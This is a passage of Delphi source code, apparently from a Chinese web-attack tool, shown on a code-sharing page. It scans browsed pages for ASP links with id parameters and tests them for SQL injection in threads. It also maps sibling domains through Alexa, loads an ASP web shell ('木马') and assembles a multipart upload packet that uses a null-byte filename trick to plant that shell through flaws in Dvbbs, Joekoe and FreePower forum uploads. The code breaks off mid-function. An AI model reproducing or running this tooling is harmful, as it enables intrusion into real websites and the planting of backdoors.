📄 mainunit.pas
字号:
for i := 0 to len - 1 do
begin
item := all.item(i, varempty);
if (Pos('.asp?', LowerCase(item)) > 1) and (Pos('id=', LowerCase(item)) > 1) and (Pos('(', item) = 0) then
if ListBox1.Items.IndexOf(item) = -1 then
ListBox1.Items.Add(item);
end; // for
end; // if Chkinject.Checked then
end; // if not Webbrowser1.Busy then
if Chkinject.Checked then {判断是否需要在浏览网页时检测注入点}
begin
if Webbrowser1.LocationURL <> 'about:blank' then
begin
if webbrowser1.ReadyState = READYSTATE_COMPLETE then
begin
try
if ListBox1.Items.Count = 0 then
begin
LbShowprogress.Caption := '检测完毕,没有注入点!';
Exit;
end;
if Web_Scan_Inject_bool2 then
begin
ScanInjectTimer.Enabled := True;
SetLength(Web_Scan_Inject, 5);
LbShowprogress.Caption := '正在检测注入点...';
WebInjectLsb.Clear;
Web_Scan_Inject_bool := False;
try
for j := 0 to 4 do
begin
Web_Scan_Inject[j] := WebThject.Create(Listbox1, WebInjectLsb, j + 1, 5);
Web_Scan_Inject[j].OnTerminate := Web_Scan_inject_Exit;
sleep(40);
end;
except
end; // try
end; // if Web_Scan_Inject_bool2 then
except
end; // try
end // if webbrowser1.ReadyState = READYSTATE_COMPLETE then
else
begin
if (Web_Scan_Inject_bool) and (ListBox1.Items.Count >= 25) then {检测前25条连接地址}
begin
Web_Scan_Inject_bool := False;
Web_Scan_Inject_bool2 := False;
ScanInjectTimer.Enabled := True;
SetLength(Web_Scan_Inject, 5);
LbShowprogress.Caption := '正在检测注入点...';
WebInjectLsb.Clear;
Web_Scan_Inject_bool := False;
try
for j := 0 to 4 do
begin
Web_Scan_Inject[j] := WebThject.Create(Listbox1, WebInjectLsb, j + 1, 5);
Web_Scan_Inject[j].OnTerminate := Web_Scan_inject_Exit;
sleep(40);
end; //for j := 0 to 4 do
except
end; // try
end; //if (Web_Scan_Inject_bool) and (ListBox1.Items.Count >= 25) then
end; // else
end; // if Webbrowser1.LocationURL <> 'about:blank' then
end; // if Chkinject.Checked then
except
end; // try
end;
procedure TMainForm.WebBrowser1ProgressChange(Sender: TObject; Progress, {网页浏览 - 缓冲进度}
ProgressMax: Integer);
begin
if WebBrowser1.LocationURL <> 'about:blank' then
EdURL.Text := WebBrowser1.LocationURL
else
EdURL.Text := '';
Gauge1.MaxValue := ProgressMax; {设置进度条的最大值}
Gauge1.Progress := Progress; {设置进度条进度和浏览器同步}
end;
procedure TMainForm.WebBrowser1StatusTextChange(Sender: TObject;
const Text: WideString);
begin
Pane1.Caption := Text; {显示缓冲信息}
end;
procedure GetAlexa; {检测网站的世界排名的自定义过程}
var
HTML: string;
begin
with MainForm do
begin
if ChkAlexa.Checked then {判断是否需要在浏览网页是检测网站排名?}
begin
HTML := UrlGetStr('http://data.alexa.com/data?cli=10&dat=snba&url=' + EdURL.Text); {读取网页代码}
if Pos('" TEXT="', HTML) = 0 then
begin
LbAlexa.Caption := '网站排名:' + 'No Data'; {提示该站点暂时没有任何排名}
Exit;
end;
{一句代码分解网站排名}
LbAlexa.Caption := '网站排名:' + Copy(Copy(HTML, Pos('" TEXT="', HTML) + 8, 50), 1, Pos('"/>', Copy(HTML, Pos('" TEXT="', HTML) + 8, 50)) - 1);
end;
end;
end;
procedure TMainForm.btnRefreshClick(Sender: TObject); {集合5个按钮的执行过程}
var
SList: TStrings;
i: integer;
D: DWORD;
begin
case TButton(sender).Tag of
0:
begin
try
WebBrowser1.Refresh; {刷新}
except end;
end;
1:
begin
try
WebBrowser1.GoForward; {前进}
except end;
end;
2:
begin
try
WebBrowser1.GoBack; {后退}
except end;
end;
3:
begin
try
PageControl2.TabIndex := 0; {回到浏览器面板}
if Trim(EdURL.Text) = '' then Exit; {没有任何网址退出执行过程}
RzSplitter1.Percent := 89;
LbShowprogress.Caption := '读取连接地址中...';
WebBrowser1.Navigate(EdURL.Text); {网页浏览}
BeginThread(nil, 0, @GetAlexa, nil, 0, D); {创建检测排名的线程}
except end;
end;
4:
begin
if EditCookie.Text = '' then Exit;
SList := TStringList.Create; {修改浏览器的Cookies}
Slist.CommaText := EditCookie.Text;
for i := 0 to SList.Count - 1 do {将Cookies分段提交给浏览器}
Doc.cookie := SList.Strings[i];
Webbrowser1.Refresh; {修改后Cookies后刷新浏览器}
SList.Free; {释放}
end;
end;
end;
procedure TMainForm.OtherSiteTimerTimer(Sender: TObject); {旁注检测 - 查询二级域名}
var
p, p2: integer;
S: TStrings;
S2: string;
i: integer;
begin
try {不断读去浏览器上输入的HTML文本}
OtherSiteMemo.Text := IHtmlDocument2(OtherSiteWeb.Document).Body.OuterText;
except
end;
if Pos('No Data', OtherSiteMemo.Text) > 1 then {判断该域名数据存在数据记录}
begin
OtherSiteTimer.Enabled := False;
OtherSiteWeb.Navigate('about:blank');
LbShowProgress.Caption := '该域名没有任何数据!';
application.MessageBox('抱歉,该域名没有任何数据!', '提示', 64);
Timer1.Enabled := False; {停止进度条前进}
Gauge1.Progress := 0;
Exit;
end;
if Pos('Where do', OtherSiteMemo.Text) > 1 then {判断文本最下面的'Where do'字符,表示已读取完毕}
begin
OtherSiteTimer.Enabled := False; {停止检测}
try
LvOtherSite.Items.Clear; {清空存放二级域名的TListView}
except
end;
S := TStringlist.Create;
S.Text := OtherSiteMemo.Text; {赋值,保存HTML文本}
if pos('Where do', s.Text) > 1 then
begin
p := pos('Where do', s.Text); {得到最下面字符的位置}
p2 := pos('Reach for', s.Text); {得到上面字符的位置}
s.Text := copy(s.Text, p, p2 - p); {复制中间部分的字符}
i := 0;
while pos('~', s.Text) > 1 do {循环将二级域名读去出来}
begin
inc(i);
p := pos('~', s.Strings[i]);
s2 := Copy(s.Strings[i], 1, p - 1);
if s2 <> 'Other websites' then
LvOtherSite.Items.Add.Caption := 'http://' + s2;
s.Text := stringreplace(s.Text, '~', '', [rfignorecase]);
end; // while pos('~', s.Text) > 1 do
end
else
begin
application.MessageBox('抱歉,该域名上没有绑定任何二级域名!', '提示', 64);
OtherSiteTimer.Enabled := False;
LbShowProgress.Caption := '没有查询到任何二级域名!';
end; // if pos('Where do', s.Text) > 1 then
S.Free;
OtherSiteWeb.Navigate('about:blank'); {查询完毕后回空空白页面,省得浏览器占用内存}
LbShowProgress.Caption := '共查询到:' + inttostr(LvOtherSite.Items.Count) + '个二级域名';
Timer1.Enabled := False; {停止进度条前进}
Gauge1.Progress := 0;
Exit;
end; // if Pos('Where do', OtherSiteMemo.Text) > 1 then
if (Pos('Where do', OtherSiteMemo.Text) = 0) and (Pos('About Alexa', OtherSiteMemo.Text) > 1) then
begin
OtherSiteTimer.Enabled := False;
LbShowProgress.Caption := '没有查询到任何二级域名!';
OtherSiteWeb.Navigate('about:blank');
Timer1.Enabled := False; {停止进度条前进}
Gauge1.Progress := 0;
application.MessageBox('抱歉,该域名上没有绑定任何二级域名!', '提示', 64);
end;
end;
procedure TMainForm.BtnScanOtherSiteClick(Sender: TObject); {旁注检测 - 调用查询二级域名的过程}
var
D: DWORD;
begin
if Pos('.', EdOtherSite.Text) = 0 then Exit; {如果非合格网址,退出执行过程}
LvOtherSite.Items.Clear;
Gauge1.MaxValue := 100; {设置进度条最大值}
Timer1.Enabled := True;
LbShowProgress.Caption := '查询二级域名中...';
OtherSiteMemo.Clear;
OtherSiteTimer.Enabled := True;
OtherSiteWeb.Navigate('http://www.alexa.com/data/details/traffic_details?q=&url=' + EdOtherSite.Text);
end;
function GetAspFile: string; {综合上传 - 读取资源文件中的asp木马文件或外部连接asp木马函数}
var
FMemo: TStringStream;
TmpStr: TStrings;
Res: TResourceStream;
begin
if MainForm.RdDefault.Checked then {如果选中默认木马,那么从资源文件中读出asp木马}
begin
FMemo := TStringStream.Create('');
Res := TResourceStream.Create(HInstance, PChar('diyasp'), 'aspfile');
Res.SaveToStream(FMemo);
Result := FMemo.DataString;
FMemo.Free;
end
else {否则连接外部的asp木马}
begin
TmpStr := TStringList.Create;
TmpStr.LoadFromFile(MainForm.AspFilePath.Text); {载入asp木马}
Result := TmpStr.Text;
TmpStr.Free;
end;
end;
procedure TMainForm.BtnBrowserFileClick(Sender: TObject); {综合上传 - 集合3个按钮的执行过程}
begin
case TButton(Sender).Tag of
0: EdtCookies.PasteFromClipboard; {粘贴Cookies}
1:
begin
if EdShellPath.Text = '' then Exit; {打开木马地址}
ShellExecute(handle, 'Open', 'EXPLORER.EXE', PChar(EdShellPath.Text), nil, SW_SHOW);
end;
end;
end;
procedure TMainForm.RdDefaultClick(Sender: TObject); {综合上传 - 选择上传的类型}
begin
case TRadioButton(Sender).Tag of
0: AspFilePath.Text := 'diy.asp'; {默认}
1: AspFilePath.Text := ''; {自选}
end;
end;
function GetHostDir(HostAddr: string): string; {综合上传 - 分解主机地址加目录地址函数}
var
P: integer;
TmpHost: string;
begin
HostAddr := StringReplace(HostAddr, 'http://', '', [rfIgnoreCase]);
TmpHost := HostAddr;
while Pos('/', HostAddr) > 1 do
begin
P := Pos('/', HostAddr);
HostAddr := StringReplace(HostAddr, '/', ' ', [rfIgnoreCase]);
end;
Result := 'http://' + Copy(TmpHost, 1, P - 1);
end;
function GetHost(Host: string): string; {综合上传 - 分解主机地址函数}
var
P: integer;
begin
Host := StringReplace(Host, 'http://', '', [rfIgnoreCase]);
P := Pos('/', Host);
if P > 1 then
Result := Copy(Host, 1, P - 1)
else
Result := Copy(Host, 1, Length(Host));
end;
function GetPostPage(Host: string): string; {综合上传 - 分解Post页面函数}
var
p: integer;
begin
Host := StringReplace(Host, 'http://', '', [rfIgnoreCase]);
P := Pos('/', Host);
Result := Copy(Host, P, Length(Host))
end;
function Dv_PostCdoe: string; {综合上传 - 构造上传ASP木马的数据包}
const
H = #13#10;
var
ASPFile: TStrings;
begin
Result := '';
Result := Result + '-----------------------------7d22f8371b051c' + H;
if MainForm.Rd_Joekoe.Checked then {如果选中的乔客上传}
Result := Result + 'Content-Disposition: form-data; name="up_name"' + H + H
else
begin
if (MainForm.Rd_Dvbbs.Checked) or (MainForm.Rd_FreePower.Checked) then {否则}
Result := Result + 'Content-Disposition: form-data; name="filepath"' + H + H;
end;
if MainForm.RdCustom.Checked then {如果选中自定义上传类型 - 开始定义路径字段}
Result := Result + 'Content-Disposition: form-data; name="' + MainForm.EdPathField.Text + '"' + H + H;
if MainForm.RdDefault.Checked then
Result := Result + MainForm.AspFilePath.Text + #0 + H
else
Result := Result + ExtractFileName(MainForm.AspFilePath.Text) + #0 + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
Result := Result + 'Content-Disposition: form-data; name="act"' + H + H;
Result := Result + 'upload' + H;
Result := Result + '-----------------------------7d22f8371b051c' + H;
if MainForm.Rd_Dvbbs.Checked then {如果选中动网上传}
Result := Result + 'Content-Disposition: form-data; name="file1"; filename="c:\image.gif"' + H;
if MainForm.Rd_FreePower.Checked then {如果选中动力上传}
begin
if MainForm.RadPower1.Checked then {动力上传类型1}
begin
if MainForm.RdDefault.Checked then {如果是默认的asp木马}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -